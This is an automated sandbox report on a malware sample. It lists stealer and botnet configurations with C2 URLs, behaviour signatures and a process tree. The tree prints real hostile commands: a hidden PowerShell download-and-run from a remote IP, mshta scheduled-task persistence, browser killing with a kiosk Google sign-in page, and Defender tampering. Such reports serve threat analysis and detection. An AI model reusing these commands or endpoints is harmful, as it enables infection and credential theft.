Analysis

  • max time kernel
    147s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20250207-en
  • resource tags

    arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
  • submitted
    16/03/2025, 18:13

General

  • Target

    d9f00ea479721f7581810bda98dca097.exe

  • Size

    2.1MB

  • MD5

    d9f00ea479721f7581810bda98dca097

  • SHA1

    0b438eab56eb426d68bdeb2bd7c6f69af19daca6

  • SHA256

    53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1

  • SHA512

    af216b63003175ac1a4a135a242b2b26a31fd49dc9988f822a04a920fb47c27961eeb481bc8bc1c4c25fc9e09f407c7e0ae079210481c515442525707773af55

  • SSDEEP

    49152:JEESzuUhMGOiuMWTSby13yX9FIgn3ITa02qmF:JQBbHWTr1493Y+IU

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://gunrightsp.run/api

https://caliberc.today/api

https://pistolpra.bet/api

https://weaponwo.life/api

https://armamenti.world/api

https://selfdefens.bet/api

https://targett.top/api

https://armoryarch.shop/api

https://blackeblast.run/api

https://codxefusion.top/api

https://hardswarehub.today/api

https://pgadgethgfub.icu/api

https://hardrwarehaven.run/api

https://techmindzs.live/api

https://bz2ncodxefusion.top/api

https://quietswtreams.life/api

https://techspherxe.top/api

https://earthsymphzony.today/api

https://begindecafer.world/api

https://9garagedrootz.top/api

Extracted

Family

marsstealer

Botnet

Default

C2

ctrlgem.xyz/gate.php

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

lumma

C2

https://codxefusion.top/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Mars Stealer

    An infostealer written in C++ based on other infostealers.

  • Marsstealer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 25 IoCs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d9f00ea479721f7581810bda98dca097.exe
    "C:\Users\Admin\AppData\Local\Temp\d9f00ea479721f7581810bda98dca097.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1544
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1784
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:768
          • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
            "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2188
            • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2688
          • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
            "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1704
            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
              6⤵
              • Executes dropped EXE
              PID:796
            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
              6⤵
              • Executes dropped EXE
              PID:1580
            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
              6⤵
              • Executes dropped EXE
              PID:992
            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2520
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 536
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:1976
          • C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe
            "C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1036
            • C:\Windows\SysWOW64\SCHTASKS.exe
              SCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1692
          • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
            "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
            5⤵
            • Executes dropped EXE
            PID:1680
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 1680 -s 36
              6⤵
              • Loads dropped DLL
              PID:2172
          • C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe
            "C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"
            5⤵
            • Executes dropped EXE
            PID:2752
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2752 -s 36
              6⤵
              • Loads dropped DLL
              PID:1536
          • C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
            "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1696
            • C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
              "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2796
          • C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe
            "C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"
            5⤵
            • Executes dropped EXE
            PID:2508
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2508 -s 36
              6⤵
              • Loads dropped DLL
              PID:1164
          • C:\Users\Admin\AppData\Local\Temp\10030290101\7db14a892a.exe
            "C:\Users\Admin\AppData\Local\Temp\10030290101\7db14a892a.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3628
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              6⤵
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              PID:3768
          • C:\Users\Admin\AppData\Local\Temp\10030300101\7a4262cb0d.exe
            "C:\Users\Admin\AppData\Local\Temp\10030300101\7a4262cb0d.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3848
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              6⤵
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              PID:1164
      • C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe
        "C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2992
      • C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe
        "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        PID:1424
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2368
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 5
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2104
      • C:\Users\Admin\AppData\Local\Temp\10235690101\36fe0958ef.exe
        "C:\Users\Admin\AppData\Local\Temp\10235690101\36fe0958ef.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn iqOvPmaHPMP /tr "mshta C:\Users\Admin\AppData\Local\Temp\wtCb5GToV.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn iqOvPmaHPMP /tr "mshta C:\Users\Admin\AppData\Local\Temp\wtCb5GToV.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2036
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\wtCb5GToV.hta
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2444
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1540
            • C:\Users\Admin\AppData\Local\TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE
              "C:\Users\Admin\AppData\Local\TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2576
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10235700121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1852
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:1932
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2496
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2836
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1600
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2604
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1240
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:980
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "mjLoCmaCSaZ" /tr "mshta \"C:\Temp\VlYw6hvKU.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1564
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\VlYw6hvKU.hta"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:3020
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:300
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2088
      • C:\Users\Admin\AppData\Local\Temp\10235930101\970d7d5d87.exe
        "C:\Users\Admin\AppData\Local\Temp\10235930101\970d7d5d87.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:2932
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 1240
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2484
      • C:\Users\Admin\AppData\Local\Temp\10235950101\2be00504eb.exe
        "C:\Users\Admin\AppData\Local\Temp\10235950101\2be00504eb.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1368
      • C:\Users\Admin\AppData\Local\Temp\10235960101\bbc9d61153.exe
        "C:\Users\Admin\AppData\Local\Temp\10235960101\bbc9d61153.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2372
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1424
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1544
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1972
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2692
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2104
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:1616
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2864
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.0.1309317612\2108020645" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1216 -prefsLen 21005 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a17c54b0-a878-4a98-b9a9-82626d9076e4} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 1300 f7f5058 gpu
                6⤵
                  PID:2944
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.1.1852479188\288482675" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21866 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0dccd414-bd02-4b62-ab2f-3ce0fb0f9d0f} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 1504 d71b58 socket
                  6⤵
                    PID:2868
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.2.39854183\1902487651" -childID 1 -isForBrowser -prefsHandle 1084 -prefMapHandle 1080 -prefsLen 21904 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {447cf66d-8c27-4fe6-ba78-307588f67ec9} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 2100 1a4c2f58 tab
                    6⤵
                      PID:3064
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.3.414991043\387812536" -childID 2 -isForBrowser -prefsHandle 2892 -prefMapHandle 2888 -prefsLen 26374 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90fc7fcc-4ffd-454a-973c-4aa8eb906e98} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 2904 d64858 tab
                      6⤵
                        PID:2844
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.4.2052196422\1959393719" -childID 3 -isForBrowser -prefsHandle 3824 -prefMapHandle 3820 -prefsLen 26509 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e8236a2-b57e-4fc8-8cd7-a25f73928ea7} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 3836 1ee95158 tab
                        6⤵
                          PID:3020
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.5.1908831669\1064270141" -childID 4 -isForBrowser -prefsHandle 3948 -prefMapHandle 3952 -prefsLen 26509 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9d7f621-4d1e-42e7-9b04-2f91033aa7ac} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 3936 1ee96658 tab
                          6⤵
                            PID:1640
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.6.1825891322\1775007727" -childID 5 -isForBrowser -prefsHandle 4120 -prefMapHandle 4124 -prefsLen 26509 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {edee6415-a452-4c94-8a07-aa79d21a2fef} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 4112 209d4558 tab
                            6⤵
                              PID:3044
                      • C:\Users\Admin\AppData\Local\Temp\10235970101\00e7be516b.exe
                        "C:\Users\Admin\AppData\Local\Temp\10235970101\00e7be516b.exe"
                        3⤵
                        • Modifies Windows Defender DisableAntiSpyware settings
                        • Modifies Windows Defender Real-time Protection settings
                        • Modifies Windows Defender TamperProtection settings
                        • Modifies Windows Defender notification settings
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Windows security modification
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3416
                      • C:\Users\Admin\AppData\Local\Temp\10235980101\1be2e64926.exe
                        "C:\Users\Admin\AppData\Local\Temp\10235980101\1be2e64926.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4024
                      • C:\Users\Admin\AppData\Local\Temp\10235990101\f96225d44f.exe
                        "C:\Users\Admin\AppData\Local\Temp\10235990101\f96225d44f.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2364
                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                          4⤵
                          • Downloads MZ/PE file
                          • System Location Discovery: System Language Discovery
                          PID:3712
                      • C:\Users\Admin\AppData\Local\Temp\10236000101\m0wsoI3.exe
                        "C:\Users\Admin\AppData\Local\Temp\10236000101\m0wsoI3.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Checks processor information in registry
                        PID:3992
